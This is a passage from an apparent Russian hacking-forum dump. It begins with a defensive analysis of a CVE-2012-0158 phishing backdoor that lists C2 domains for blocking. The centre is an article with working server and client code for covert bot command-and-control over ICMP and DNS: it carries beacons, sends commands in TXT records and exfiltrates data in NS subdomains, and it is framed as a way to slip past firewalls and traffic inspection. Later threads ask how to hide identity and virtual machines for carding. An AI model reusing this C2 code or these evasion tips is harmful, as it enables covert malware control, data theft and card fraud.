CVE-2012-0158 - уязвимость переполнения буфера в некоторых функциях библиотеки MSCOMCTL.OCX. Вредоносный код может быть вызван специально созданным файлом DOC или RTF для версий MS Office 2003, 2007 и 2010.

Узнаем подробнее откуда взялся этот документ. Самым известным способом доставки вредоносных документов является – почта. На скомпрометированной машине имеется несколько почтовых клиентов. Один из них это « Mozilla Thunderbird ». Т.к. после анализа реестра стала известна дата запуска ВПО, а именно 27.05.2015, то в первую очередь просмотрим письма, присланные на скомпрометированный компьютер в окрестности этого дня. Среди всех писем имеется три письма с вложениями:

Приглашение к участию в конференции ГА-2016
Конкурс
Монголия возвращает визовый режим для россиян

Ниже приведено одно из найденных фишинговых писем:

Убедимся, что вложения вредоносные. Для этого выгрузим их и снова воспользуемся утилитой « Yara-scanner » вместе с правилом для анализа вредоносных документов « quicksand_exploits »:

Видим, что все документы эксплуатируют уязвимость CVE-2012-0158. Посмотрим запускались ли они. Для этого рассмотрим куст реестра « Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc » из файла « NTUSER.DAT »:

Убеждаемся, что все они запускались.
После анализа SMTP заголовков писем было выявлено, ip адреса отправителей принадлежат компании « Chunghwa Telecom », которая является крупнейшей телекоммуникационной компанией в Китайской Республике, а также Японской телекоммуникационной компании « KDDI Corporation », которая является оператором мобильной связи. Адреса отправителей не подделаны.

На виртуальной машине с Windows 7 для анализа вредоносных word-документов установим такой же MS-WORD, как и на скомпрометированной машине, а именно MS- WORD 2010.
Для доставки полезной нагрузки на компьютер с помощью word-документа могут применяться два метода:

После запуска, из документа выгружается дроппер, который скачивает основную полезную нагрузку.
После запуска, из документа выгружается основная полезная нагрузка.

Рассмотрим размеры вредоносных вложений. В среднем каждый документ весит 300 кб. Для таких маленьких по размеру документов это говорит о том, что полезная нагрузка выгружается непосредственно из документа:

Проверить это можно открыв «wireshark» и открыть документ. Увидим что трафик отсутствует, а в папке %AppData% появились вредоносные файлы. Ещё для проверки есть «умный» способ. Если в документе эксплуатируется данная CVE, то можно просто открыть его как архив и увидим вредоносные файлы.

Таким образом, была восстановлена схема атаки :

На компьютер жертвы было прислано три письма с вредоносными вложениями, эксплуатирующие уязвимость CVE-2012-0158.
При открытии вредоносных вложений выгружается основная полезная нагрузка в виде dll-библиотеки « comctl32.dll » и системной утилиты « rundll32exe ».
Утилита «rundll.exe» импортирует единственную функцию из вредоносной библиотеки, после чего ВПО закрепляется в системе и начинает производить деструктивное воздействие.

Ниже приведена схема атаки в графическом виде :

Анализ оперативной памяти проведем с помощью инструмента “ Volatility Framework ”.
С помощью плагина “ pstree ” выведем список процессов в виде дерева. На скринсшоте ниже видим вредоносный процесс с PID 3376 « rund1132.exe ».

Рассмотрим его подробнее. Для этого воспользуемся плагином « dlllist », который выводит список импортированных библиотек и параметры командной строки, с которыми был запущен процесс:

Рассмотрев пункт « Command line » снова убеждаемся в том, что утилита « rund1132.exe » импортирует функцию « Enter » из библиотеки « comctl32.dll ». Особый интерес вызывает библиотека “ comctl32.dll ”. С помощью плагина “ dlldump ” выгрузим её из оперативной памяти для дальнейшего анализа:

Также заметим, md5 суммы выгруженной библиотеки и той, которая располагается в директории « C:\Users\PC\AppData\Roaming » отличаются:

Для того, чтобы понять в чем между ними разница произведем базовый статический анализ данной библиотеки. Сначала узнаем каким компилятором была скомпилированна библиотека и запакована ли она:

Для того, чтобы понять в чем отличие библиотек, воспользуемся утилитой « Strings » из пакета « SysinternalsSuite » и сравним их строки. При анализе первой библиотеки, почти все строки имеют «мусорный вид», а значит скорее всего они обфусцированны. При анализе второй библиотеки выяснилось, что в ней почти все строки имеют читаемый вид. Это говорит о том, что после импортирования функции « Enter » все статические данные деобфусцируются.

В процессе изучения первой библиотеки, были найдены такие строки:

Пробуя их загулить попадаем на гит в проект под названием « ZLIB »:

ZLIB - представляет собой свободную кроссплатформенную библиотеку для сжатия данных.

Теперь становится ясно чем обфусцируются ключевые данные. Чтобы наверняка убедиться в этом, произведем дизассемблирование данной библиотеки и сравним полученный код с тем, что размещен на гитхабе. В качестве дизассемблера будет использоваться « IDA Pro ».

Ниже приведены два фрагмента одинакового кода с гитхаба и дизассемблера, что подтверждает нашу теорию:

Далее имеет смысл рассматривать только « unload_comctl32.dll ». Большинство её строк — это название функций функции. Это говорит о том, что вероятнее всего все они вызываются по адресу полученному с помощью функции « GetProcAddress ». Полный список строк приводится не будет, т.к. он слишком огромный, но стоит отметить что в программе используются все функции для работы с сокетами, интернетом, файлами, процессами, сервисами, шифрованием, мьютексами, пайпами, клавиатурой, экраном и прочим.

DNS-адреса центров управления:

Проведем базовый динамический анализ в песочнице «Cuckoo Sandbox».
Т.к. вредоносный трафик нежелательно выпускать в сеть Интернет, то при загрузке библиотеки в песочницу, в качестве сетевого окружения выберем INetSim.
INetSim - это программный пакет на основе Linux, предназначенный для симуляции распространенных интернет-служб. Он позволяет анализировать сетевую активность неизвестных вредоносных образцов путем эмуляции серверов, работающих по протоколам HTTP, HTTPS, FTP, IRC, DNS, SMTP и т. д.

Перейдем во вкладку « Summary » и увидим какие « Yara » правила обнаружили вредоносную активность:

Видим, что у ВПО имеется как минимум следующий функционал:

Соединение с центром управления по HTTP и TCP протоколам
Повышение привилегий
Создание скринсшотов
Запуск кейлогера
Кража учетных данных в системе
Кража учетных данных в браузере IE7
Изменение реестра

Рассмотрим сетевую активность. Для этого перейдем во вкладку « Network Analysis ». В песочницу были загружены Snort правила 2015 года , чтобы разбор инцидента примерно соответствовал тому, что было несколько лет назад. Сразу заметим, что системы обнаружения никак не отреагировали на сетевую активность:

Скачаем образец сетевого трафика и проанализируем его вручную с помощью утилиты «Wireshark». В самом начале производится соединение на 80 порт. После этого идет GET запрос вида « GET /wpad.dat HTTP/1.1 ».

Просмотрим их в удобочитаемом виде:

Web Proxy Auto-Discovery Protocol (WPAD) — протокол для автоматической настройки прокси-сервера. Он служит для того, чтобы найти файл PAC (Proxy Auto Config), представляющий собой JavaScript с описанием логики, по которой браузер будет определять, как подключаться к нужному URL. При совершении любого запроса браузер вызывает функцию « FindProxyForURL» из PAC-файла, передает туда URL и хост, а в результате ожидает узнать, через какие прокси ходить на этот адрес.

Анализируя нашу функцию « FindProxyForURL » видим, что все запросы, которые производятся вне локальной сети «192.168.1.0/24», перенаправляются на прокси атакующего, который слушает на порту 8080. Стоит отметить, что данная техника позволяет перехватывать весь HTTP трафик, а также частично обойти HTTPS- шифрование и получить доступ к URL’ам всех запросов пользователя, где часто передаются OAuth-токены.

После данных манипуляций можно увидеть, что весь трафик идет на порт 8080, но все TCP соединения разрываются, т.к. « INetSim » не поддерживает симуляцию прокси и порт недоступен:

На этом анализ сетевого трафика закончен.

Далее было произведено дизассемблирование этой библиотеки. Разбора реверса не будет, чтобы и так не раздувать статью. Приведу лишь результаты. На протяжении выполнения остальной части кода, используется методика противодействия динамическому анализу, которая заключается в подсчете миллисекунд между двумя участками кода с помощью функции « GetTickCount ». Стоит отметить, что данный прием анти-отладки легко обойти с помощью большинства дизассемблеров, т.к. функция « GetTickCount » возвращает количество миллисекунд в регистр EAX, а его всегда можно обнулить вручную, либо скачать плагин к IDA, который будет это делать за вас.

Был найден механизм удаленного управления. Перед выполнением каждой команды ВПО посылает GET-запрос. Причем с каждым новым запросом значение « struct_counter[65] », которое изначально равно нулю инкрементируется на единицу. Таким образом самый первый GET-запрос будет выглядеть следующим образом: «/bbs/0/forum.php?sid=0 »:

Этот факт понадобиться далее, чтобы написать правила детектирования для Snort.
Ответ сервера парсится в соответствии со своим сетевым протоколом и расшифровывает их используя следующий алгоритм. Для удобства читаемости алгоритм был переписан на « Python »:

Сам сетевой протокол имеет следующий вид:

command_id – номер команды, которую нужно выполнить.
length_of_encrypted_data – длина зашифрованной команды.
length_of_decrypted_data – длина расшифрованной команды.
encrypted_data – зашифрованная команда.

При дальнейшем анализе параметра command_id был найден следующий функционал:

Удаление ВПО
Получение информации о ПК
Выполнение консольной команды
Получение списка сервисов
Запуск/остановка/удаление сервиса
Получение списка процессов
Завершение процесса
Получение списка файлов в директории
Запись/чтение/удаление файла
Создание каталога

**Этап « Ликвидация »**

После того, как на этапе « Изучение » ВПО было полностью разобрано, можно приступать к его удалению. Для этого необходимо выполнить следующие действия:

Удалить фишинговые письма
Удалить вредоносные вложения, выгруженные из этих писем
Удалить вредоносную библиотеку « comctl32.dll » и утилиту для импортирования функций « rundll32.exe » из директории « C:\Users\PC\AppData\Roaming ».
Почистить ветку реестра « Software\Microsoft\Windows\CurrentVersion\Run» от автоматического запуска утилиты « rundll32.exe ».

Для того, чтобы эффективно найти все остальные зараженные компьютеры в сети напишем « Yara » правило основанное на найденных индикаторах компрометации:

После полного удаления ВПО, необходимо удалить правила МЭ на блокирование входящего и исходящего траффика.

**Этап « Выводы »**

В процессе изучения ВПО было выяснено, что оно попало на компьютеры с помощью вредоносных вложений в фишинговых письмах используя уязвимость для старых версий « MS-WORD » CVE-2012-0158. По функционалу данное ВПО относится к типу « backdoor », но также имеет функционал « keylogger » и перехвата трафика. Оно имеет статические и динамические приемы обфускации в виде использования библиотеки « ZLIB » для сжатия ключевой информации и высчитывания время выполнения между интервалами команд с помощью функции « GetTickCount ».

Для того, чтобы в следующий раз вовремя отреагировать на данный инцидент, необходимо на СЗИ внести новые правила, реагирующие на это ВПО. Для примера напишем следующее регулярное правило для « Snort », где спецсимвол \d означает целочисленное значение:

Также занесем DNS-адреса центров управления в черный список « /etc/snort/blacklist »:

top.gupdiic.com
panaba.empleoy-plan.com
peak.measurepeak.com

На всех ПК необходимо обновить устаревшее ПО такое как « MS-WORD 2010 ». На антивирусах внести в базу данных полученные хэш-суммы ВПО из главы «Базовый динамический анализ», а также хэш-суммы вредоносных фишинговых документов.

На этом разбор закончен. Спасибо за внимание!?

Заменяем HTTP. Варианты обмена данными между клиентом и сервером по альтернативным протоколам

ID: 676533bbb4103b69df371c88
Thread ID: 43451
Created: 2020-10-23T10:38:01+0000
Last Post: 2020-10-31T12:31:32+0000
Author: pic4a
Prefix: Статья
Replies: 11 Views: 3K

Введение

Сегодня HTTP является одним из наиболее распространенных протоколов для передачи данных между приложениями. Если не самым распространенным. И речь не только о браузере. Очень много приложений, в особенности мобильных, на сетевом уровне представляют из себя HTTP-клиент. Протокол достаточно простой (в общем случае, не вдаваясь в специфику), расширяемый, реализации клиентов и серверов существуют на множестве языков программирования и для большого количества платформ, поэтому неудивительно что он так быстро и широко распространился. Однако, не всегда выбор наиболее популярного инструмента явлется наиболее подходящим, и далее речь пойдет как раз о том, когда такие случаи возникают и что с ними делать.

Примечание: принципиально ничего нового ниже описано не будет, ранее в том или ином виде информация присутствовала на других ресурсах. Все фундаментальные концепты в большинстве случаев (эта формулировка здесь только чтобы исключить 100%) уже давно придуманы и описаны, нам остается лишь играть с вариациями. Целью является скорее скомпоновать теорию с практической частью, показать направление для дальнейшей доработки под свои нужды. Плюс материал хорошо вписывается к другим статьям из конкурса.
Весь код, фрагменты которого используются в тексте, доступен в архиве в этом посте.

Чем плох HTTP
Не плох, а в некоторых случаях может не быть наиболее подходящим решением.

Первое: он избыточен для небольшого количества данных. Представим ситуацию, когда клиент шлет отстук. Обычно в пакет добавляется определенный токен, и клиент обращается к ресурсу GET/POST запросами.
Вот как может выглядеть типичный пример:

Code:Copy to clipboard

GET /gate.php?t=token HTTP/2
Host: host.com
User-Agent: curl/7.41.1
Accept: */*

И типичный ответ:

Code:Copy to clipboard

HTTP/2 200
server: nginx
date: Sat, 10 Oct 2020 10:30:29 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
content-length: 2

ok

Из примера видно, что лишь небольшая часть приходится на данные приложения. А это самый простой пример, обычно заголовков отправляется куда больше. Да, при передаче файлов или страницы разметки (или json-данных) заголовки могут не занимать так много места в сравнении с данными всего пакета, однако это не всегда так.

Второе: HTTP-отлично фильтруется. Из-за повсеместного использования протокола любой инструмент, у которого есть возможность мониторинга трафика, прекрасно справляется с анализом данных в пакетах. При использовании HTTPS задача не сильно усложняется. Как правило эти же инструменты проблему и решают. Например, это типовая задача для антивирусного ПО или корпоративных прокси- серверов.

Почему не надо писать свой протокол
Трафик таких протоколов – отличный артефакт, который легко детектируется. К тому же нередки случаи, когда разрешены только определенные протоколы и/или порты, чтобы исключить использование на машинах различного дополнительного софта. Причем зачастую это функциональность штатного фаервола на рабочей станции. Думаю окно ниже знакомо большинству читателей.

У профессиональных инструментов функционал куда более навороченный. Рекомендую пройтись по выдаче, у всех вендоров есть о чем рассказать.
Однако, для тех, из кого энтузиазм бьет ключом у меня хорошая новость: вы слихвой сможете его применить по назначению, и ниже я покажу пример как именно.

Что брать на замену HTTP
Исходя из вышеописанных ограничений выходит, что нужно брать за основу не менее распространенный протокол, скорее всего использующийся достаточно широко, чтобы быть доступным к использованию везде, где есть хоть какой-то сетевой доступ. Таких протоколов на самом деле существует достаточное количество. Например, тот же SMTP. Но с ним не все так однозначно, и это тоже темы статьи не касается. А вот на DNS, к примеру, без которого тот же SMTP немыслим, или ICMP можно остановиться подробнее. Сегодня в большинстве случаев если у машины есть сетевой доступ, то скорее всего будет работать передача DNS/ICMP трафика. Без первого невозможен резолв доменов, второй используется для проверки доступа к машинам в сети. Рассмотрим оба варианта с различными частными случаями, начнем с более простого ICMP.

ICMP
Начнем с серверной части. Для того, чтобы принимать (и модифицировать, что важно) ICMP-пакеты, потребуется линуксовая машина с правами рута. В первую очередь необходимо отключить обработку ICMP-пакетов операционной системой.

Code:Copy to clipboard

sysctl -w net.ipv4.icmp_echo_ignore_all=1

Обработкой запросов займется питон (это будет серверная часть). Для этого потребуется установить зависимости:

Code:Copy to clipboard

pip install impacket

Шаблон простого сервера, который отвечает на ICMP-запросы выглядит следующим образом:

Code:Copy to clipboard

import os
import select
import socket
import subprocess
import sys
from impacket import ImpactDecoder
from impacket import ImpactPacket

def main():
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        sock.setblocking(0)
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    except socket.error as e:
        sys.stderr.write('run as root\n')
        sys.exit(1)
    ip = ImpactPacket.IP()
    icmp = ImpactPacket.ICMP()
    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)
    decoder = ImpactDecoder.IPDecoder()
    while 1:
        if sock in select.select([ sock ], [], [])[0]:
            buff = sock.recv(4096)
            # Packet received; decode and display it
            ippacket = decoder.decode(buff)
            icmppacket = ippacket.child()
            if icmp.ICMP_ECHO == icmppacket.get_icmp_type():
                ident = icmppacket.get_icmp_id()
                seq_id = icmppacket.get_icmp_seq()
                data = icmppacket.get_data_as_string()
                dst = ippacket.get_ip_src()
                ip.set_ip_src(ippacket.get_ip_dst())
                ip.set_ip_dst(dst)
                # устанавливаем номер пакета и идентификатор
                icmp.set_icmp_id(ident)
                icmp.set_icmp_seq(seq_id)       
                # кладем в данные пакета то что пришло
                icmp.contains(ImpactPacket.Data(data)
                # рассчитываем контрольную сумму
                icmp.set_icmp_cksum(0)
                icmp.auto_checksum = 1
                # упаковываем все в ip пакет и отправляем
                ip.contains(icmp)               
                sock.sendto(bytes(ip.get_packet()), (dst, 0))

if __name__ == '__main__':
    main()

Шаблон клиента целиком повторять не буду, он доступен на странице [msdn](https://docs.microsoft.com/en-us/windows/win32/api/icmpapi/nf-icmpapi- icmpsendecho2). Остановлюсь на наиболее интересном участке, в котором как раз происходит передача пакета и получение результата.

Code:Copy to clipboard

dwRetVal = IcmpSendEcho2(hIcmpFile, NULL, NULL, NULL,
ipaddr, SendData, sizeof (SendData), NULL,
ReplyBuffer, ReplySize, 1000);
if (dwRetVal != 0) {
PICMP_ECHO_REPLY pEchoReply = (PICMP_ECHO_REPLY) ReplyBuffer;
struct in_addr ReplyAddr;

В общем случае при отправке запроса в pEchoReply.Data будет содержаться отправленное ранее сообщение (SendData). Показал на скриншоте ниже как это выглядит в отладке.

Если отправленное сообщение совпадает с полученным, а также равны номера последовательности, то считается, что пинг проходит. Однако, технически нет никаких ограничений, запрещающих отклониться от спецификации и отправить любой ответ. Таким образом можно передавать данные внутри ICMP.

Для этого достаточно немного изменить участок сервера, который кладет данные для отправки.

Code:Copy to clipboard

if contains_bot_signature(data):
#обработка данных и генерация нового сообщения
data = gen_bot_data(data)
# кладем в данные пакета то что пришло
icmp.contains(ImpactPacket.Data(data))

В этом случае сервер будет отвечать на любые ICMP-запросы как того требует спецификация, а в особых случаях выполнять дополнительные действия. В данном случае псевдокод показывает что переданные данные соответствуют предполагаемому шаблону. Самый простой случай – наличие определенной последовательности в данных (только не надо вписывать подпись my_awesome_hidden_program или что-то в этом духе). Далее полученные данные передаются дальше для генерации ответа “особому клиенту”. Внутри уже будет полноценный парсинг данных и подготовка ответа.

Еще есть вариант игнорировать все запросы, кроме каких-то определенных. В этом случае необходимо изменить условие соответствия пакета выбранному типу.

Code:Copy to clipboard

if icmp.ICMP_ECHO == icmppacket.get_icmp_type() and сontains_bot_signature(icmppacket.get_data_as_string()):

DNS

Иногда передача ICMP-трафика может быть ограничена или заблокирована. Например, ICMP может быть доступен только в локальной сети. В этом случае DNS явлется хорошей заменой. И хотя его тоже могут резать на шлюзе, вероятность того, что DNS-запрос уйдет наружу намного выше. Начнем также с серверной части.

Code:Copy to clipboard

pip install dnslib

За основу взят пример с гитхаба.

В общих чертах о том, как работает скрипт. Он читает файл и для каждой записи создает экземпляр класса Record, внутри которого в поле rr есть информация о том, какую информацию отдавать клиенту, в случае, если для объекта вызов метода match возвращает положительный результат. Скрипт передает в днс сервер объект Resolver, которому передается обработка каждого входящего DNS-запроса. Он в свою очередь при получении запроса проходит по списку записей, и если есть совпадение – достает ответ из этой записи. В случае, если совпадений нет – запрос уходит далее в UPSTREAM.

Ниже приведен измененный участок сервера:

Code:Copy to clipboard

CC_DOMAIN = 'example.com'

def domain_contains_ns_data(q):
    return len(q.qname.label) == 4


def domain_contains_bot_signature(q):
    global CC_DOMAIN
    if len(q.qname.label) < 3:
        return False
    domain = q.qname.label[-2].decode("utf-8") + '.' + q.qname.label[-1].decode("utf-8")
    return domain == CC_DOMAIN \
           and q.qname.label[-3].decode("utf-8") == 'DDAACC33ABEB'


def parse_domain_as_string(q):
    domain = ''
    for subdomain in q.qname.label:
        if len(domain) > 0:
            domain += '.'
        domain += subdomain.decode("utf-8")
    return domain


class BotRecord(Record):
    def match(self, q):
        global CC_DOMAIN
        if domain_contains_bot_signature(q):
            if q.qtype == QTYPE.MX:
                self.update_mx_data(q)
                return True
            elif q.qtype == QTYPE.TXT:
                self.update_txt_data(q)
                return True
            elif q.qtype == QTYPE.NS and domain_contains_ns_data(q):
                # в data переданная информация с клиента
                data = q.qname.label[0].decode("utf-8")
                self.update_ns_data(q)
                return True
            return False
        return Record.match(self, q)

    def update_txt_data(self, q):
        """
        пример передачи команд
        :param q:
        :return:
        """
        Record.build_rr(self, rname=parse_domain_as_string(q), rtype='TXT', args=['command1, command2, etc'])

    def update_mx_data(self, q):
        """
        пример отстука
        :param q:
        :return:
        """
        Record.build_rr(self, rname='error-ok.' + parse_domain_as_string(q), rtype='MX')

    def update_ns_data(self, q):
    """
        пример передачи данных на сервер
        :param q:
        :return:
        """
        Record.build_rr(self, rname='error-ok.' + parse_domain_as_string(q), rtype='NS')

И далее пояснение того, что же изменилось. Унаследовали класс BotRecord от Record и переопределили метод match, в котором сначала проверяется, является ли входящий запрос от “особых клиентов”. Т.к это только пример, проверяется наличие домена CC_DOMAIN и строки, отведенной под клиента. К ней вернемся позднее. Если запрос подтвердился, то проверяется его тип и в зависимости от типа генерируется ответ клиенту. Это как раз пример того, как можно обмениваться данными по DNS, причем структурно весь трафик будет валидным. Основная идея в том, что запрос определенных записей отвечает за функционал приложения. Так, MX-записи являются своего рода отстуком. Запросив MX-записи домена id.example.com сервер может использовать поддомен id в качестве идентификатора и сохранять запись о клиенте в системе. Строка “ DDAACC33ABEB ” как раз показывает, что можно в качестве id передавать mac-адрес.

Запросив TXT-записи для домена DDAACC33ABEB.example.com можно получать список команд. Прелесть TXT-записей заключается в том, что по стандарту записи как раз и отведены под хранение произвольных текстовых данных. А запрос NS-записей используется для передачи данных на сервер, где в качестве данных используется поддомен, следующий за идентификатором. Например, для домена test.DDAACC33ABEB.example.com строка test будет являться передаваемыми данными. На самом деле все это можно было уместить в запрос записи одного типа, но хотелось показать что DNS в плане возможных вариантов очень многообразен.

После совпадения сигнатуры и типа записи генерируется ответ клиенту. Метод build_rr содержит код из конструктора Record, в котором происходит создание RR, а сам конструктор теперь также вызывает этот метод.

При генерации ответа используются записи в качестве информации о результатах запроса. Т.к. никакой особой логики нет, всегда генерируется поддомен error- ok, который воспринимается как выполнение запроса без ошибок.

Клиентская часть в части отправки пакета более простая. У винапи есть библиотека dnsapi, которую и будем использовать. Фактически, все строится вокруг функции DnsQuery. В более новых версиях, начиная с Windows 8, появилась функция DnsQueryEx. Но именно из-за ее “новизны” решено было ее отдать предпочтение ее более старому варианту.

Code:Copy to clipboard

PIP4_ARRAY pSrvList = NULL;
pSrvList = (PIP4_ARRAY) LocalAlloc(LPTR,sizeof(IP4_ARRAY));
if (!pSrvList) {
return 1;
}
pSrvList->AddrCount = 1;
pSrvList->AddrArray[0] = inet_addr("192.168.0.78");
if ( pSrvList->AddrArray[0] == INADDR_NONE ) {
LocalFree(pSrvList);
return 1;
}
PDNS_RECORD pDnsRecord;
DNS_STATUS ds = DnsQuery_A(
"DDAACC33ABEB.example.com", DNS_TYPE_MX,
DNS_QUERY_BYPASS_CACHE|DNS_QUERY_NO_HOSTS_FILE,
pSrvList, &pDnsRecord, NULL);
DNS_FREE_TYPE freetype;
freetype = DnsFreeRecordListDeep;
DnsRecordListFree(pDnsRecord, freetype);

Заполнение структуры pSrvList не обязательно, если не нужно слать запросы на определенный IP-адрес. Например, если домен example.com уже ведет на необходимый DNS-сервер. Здесь это сделано потому, что все эксперименты происходили внутри локальной сети.

Для записей NS, MX из примера достаточно пройти в указатель pDnsRecord.pName и обработать ответ. Содержимое для TXT записей будет находиться в (((*(pDnsRecord)).Data).TXT).pStringArray. Это массив в каждом значении которого будет находиться по одной записи.

Возможные проблемы
Не смотря на то, что DNS может в некоторых случаях работать по TCP, оба протокола в своем штатном исполнении не гарантируют доставку и очередность пакетов. А значит, надо самостоятельно заботиться о контроле передаваемых данных. Делать это можно, например, добавляя номер пакета (в ICMP для этого есть отдельное поле) и контрольную сумму в секцию данных. Соответственно, если по пути пакет потерялся или не дошел в исходном виде, необходимо отправить ответ на передачу заново.

В примерах данные передаются в открытом виде – это не призыв к действию, а пример без лишней смысловой нагрузки. Данные необходимо шифровать. И паковать перед этим их тоже не помешает. Это не “резиновый” HTTP все-таки.

Если вдруг потребуется отправить DNS-запрос на нестандартный порт, то я не нашел как это можно сделать через DnsQuery. Возможно плохо искал. Но также возможно что потребуется использовать сторонние библиотеки, или писать клиент на сокетах.

Фаерволы все равно могут блокировать передачу любого трафика для всех приложений, не входящих в определенный список. В этом случае рекомендую присмотреться к встроенным в систему скриптовым интерпретаторам, которых не так уж и мало, или ПО, с которым можно работать через API, и у которого эти доступы есть. К сожалению в этом случае нет определенных рекомендаций, придется разбираться на месте.

Вместо заключения
Критика, предложения и другие формы обратной связи приветствуются. Особенно на тему использования других протоколов.

Очередной вопрос по анонимности

ID: 676533bbb4103b69df371c9e
Thread ID: 40652
Created: 2020-08-08T00:10:41+0000
Last Post: 2020-09-16T00:17:00+0000
Author: fghz111
Replies: 25 Views: 3K

Всем привет. По моему скромному опыту лазания по форумам в подобных разделах, в 90% случаев советуют, что то из класса vpn + tor + vpn. Отсюда возникают вопросы: где взять актуальную информацию про современные методы деанона? Для вбива cc, может tor + vpn вполне норм, но для пентеста коммерческих организаций? Посоветуйте плиз, что посмотреть/почитать.

Whonix + Vmware?

ID: 676533bbb4103b69df371c94
Thread ID: 42653
Created: 2020-09-30T04:27:25+0000
Last Post: 2020-09-30T15:58:49+0000
Author: nigger
Replies: 22 Views: 3K

Задача:
Организовать получение Win10 на Vmware интернета через тор, то есть вирта не должна знать IP хоста (хост win10)

Зачем мне это нужно:
Использую просто запущенный на виртуалке опенвпн, но хулиганскому софту ака сфера/мультилогин явно на это плевать, хочется подстраховаться

Полно гайдов для виртуалбокс, но ни 1 для vmware, единственный на ютубе уже устарел и ova файлы на workstation не запускаются

Прошу помочь-направить

анонимный мессенджер через TOR

ID: 676533bbb4103b69df371cfd
Thread ID: 26180
Created: 2018-10-04T03:22:33+0000
Last Post: 2020-03-01T11:28:05+0000
Author: xrahitel
Replies: 10 Views: 3K

Говорят анонимность-это свобода слова,так ли это на самом деле?

Сегодня тема зайдет о мессенджере Ricochet а также подробностях о нем.
Ricochet - экспериментальный мессенджер на базе tor сети.
Работает через ретрансляторы TOR тем самым давая вам анонимный выход в сеть мессенджера подменивая ваш IP адрес, вместо имени пользователя вы получаете уникальный адрес, который выглядит как

ricochet: rs7ce36jsj24ogfw.

Click to expand...

Также все сообщения шифруются что делает попытку деанона намного сложнее обычного.
Ricochet это OpenSource разработка его сурсы есть в интернете:
Ссылка: ricochet-im/ricochet
Офф сайт: ricochet.im

Также есть альтернатива от пользователя sshmanager

Полная децентрализация. Все через тор!

Что реализовано :

язык русский/английский
настройка тор соединения
антиспам
обмен файлами
авторизация.
скриншотер.
поиск в истории.
*режим вида контактов.

При первом запуске всплывает окно подключения к тору, думаю менять ничего не надо просто нажимаете конект и все.

Cкачать Torum:тут видео урок по работе тут

Настройка виртуальной машины.

ID: 676533bbb4103b69df371d00
Thread ID: 33282
Created: 2019-11-19T13:06:24+0000
Last Post: 2020-02-13T00:12:28+0000
Author: Augustus
Replies: 7 Views: 3K

Добрый день, создаю тему, так как не нашел разжеванной статьи/темы на форуме о правильной настройке и подготовке к работе (вбив) виртуальной машины, (собственная мак, виртуалбокс на него винда соответственно). Я пока полный ноль в терминологии и многих функциях связанных с анонимностью и заметанием следов, но учусь и постепенно готовлюсь, уважаемые знатоки (а их тут много, уверен), пожалуйста, распишите подробно или может отправьте ссылку на статью/тему, где все понятно и поэтапно описывается какие конфиги в виртуалке ставить, настройку всех прокси, впн, браузера и т.д. Буду весьма признателен вам, джентельмены.

vpn купить

ID: 676533bbb4103b69df371d06
Thread ID: 33155
Created: 2019-11-12T14:54:03+0000
Last Post: 2019-11-27T00:12:53+0000
Author: K@ar@puz
Replies: 6 Views: 3K

Задался таким вопросом "VPN"посоветуйте какой лучше,где купить.

Слив курса по кибербезопасности

ID: 676533bbb4103b69df371d0a
Thread ID: 33215
Created: 2019-11-15T10:39:21+0000
Last Post: 2019-11-19T13:49:32+0000
Author: wulkan
Prefix: Мануал/Книга
Replies: 6 Views: 3K

Полезный новичкам курс, о том как защитить себя от взлома со стороны хакеров и спец служб. Об основных правилах информационной гигиены.

Простым языком о ландшавте угроз и уязвимостей, шифровании, приватности операционных систем.

Пользе виртуализации, подробно про QubesOS и WhonixOS плюсы и минусы. И еще много много всего.:wink:

Курс сам забугорный, переведено качественно, изложено просто, чтоб даже новичек все понял и разобрался.

курс по кибербезопасности :smile12:

Минимальная настройка конфиденциальности.

ID: 676533bbb4103b69df371d1f
Thread ID: 30875
Created: 2019-08-07T14:07:45+0000
Last Post: 2019-10-10T13:00:30+0000
Author: Guron_18
Prefix: Статья
Replies: 4 Views: 3K

Доброго времени суток.
Много статей видел по анонимности и безопасности, но толку от них маловато ибо все пишут раздельно и не углубляясь в суть того, что пишут. Поэтому пока мне скучно и шалит провайдер лишая меня деградировать за мемчиками в вк решил написать мини-статейку о том как немного повысить свою конфиденциальность в интернете.

Вкратце о чем пойдет речь? Шифрование трафика, настройка браузера, плагины.

Настройка системы (windows)

Тут все просто. Заходим в настройки сетевого адаптера и выключаем все ненужное. Оставив только IPv4. На этом все)

Spoiler: Настройка системы

Шифрование DNS.

Что бы разобраться что это такое, для чего это нужно и как работает мы пойдем на замечательную [статейку на хабре.](https://habr.com/ru/company/it- grad/blog/429768/) (некая выдержка из нее изложена ниже)
Что такое DNS мы разбирать не будем я думаю это все знают.

DNS

Протокол не шифрует запросы от пользователя к серверу и ответы на них. Данные транслируются в виде текста. Таким образом, запросы содержат имена хостов, которые посещает пользователь. Отсюда появляется возможность «подслушать» канал связи и перехватить незащищенные персональные данные.

Click to expand...

DNS over HTTPS, или DNS поверх HTTPS - сокращенно DoH

Запросы на определение IP-адреса отправляются не DNS-серверу, а инкапсулируются в трафик HTTPS и передаются HTTP-серверу, на котором специальный резолвер обрабатывает их с помощью API. DNS-трафик маскируется под обычный HTTPS-трафик, а связь клиента и сервера происходит через стандартный для HTTPS порт 443. Содержание запросов и факт использования DoH остаются скрытыми.
Минусы:
системные администраторы не смогут блокировать потенциально вредоносные сайты, а рядовые пользователи будут лишены возможности организации родительского контроля в браузерах.

Click to expand...

DNS over TLS - сокращенно DoT

Использует TLS. Для подключения к DNS-серверу при этом используется отдельный порт — 853. Из-за этого отправка DNS-запроса не скрывается, как в случае с DoH.
Минусы:
из-за того, что протокол работает с выделенным портом, третья сторона сможет отслеживать использование защищенного канала и при необходимости блокировать его.

Click to expand...

DNSCrypt

Качаем, устанавливаем, запускаем.
https://github.com/jedisct1/dnscrypt-proxy/releases/latest
Сразу оговорюсь DNSCrypt

Поможет
защититься от подмены серверов DNS злоумышленниками,
зашифровать DNS запросы.

Не поможет
сохранить приватность в интернете,
получить доступ к заблокированным в вашей стране сайтам,
защитить от подмены, если отредактирован файл hosts на компьютере.

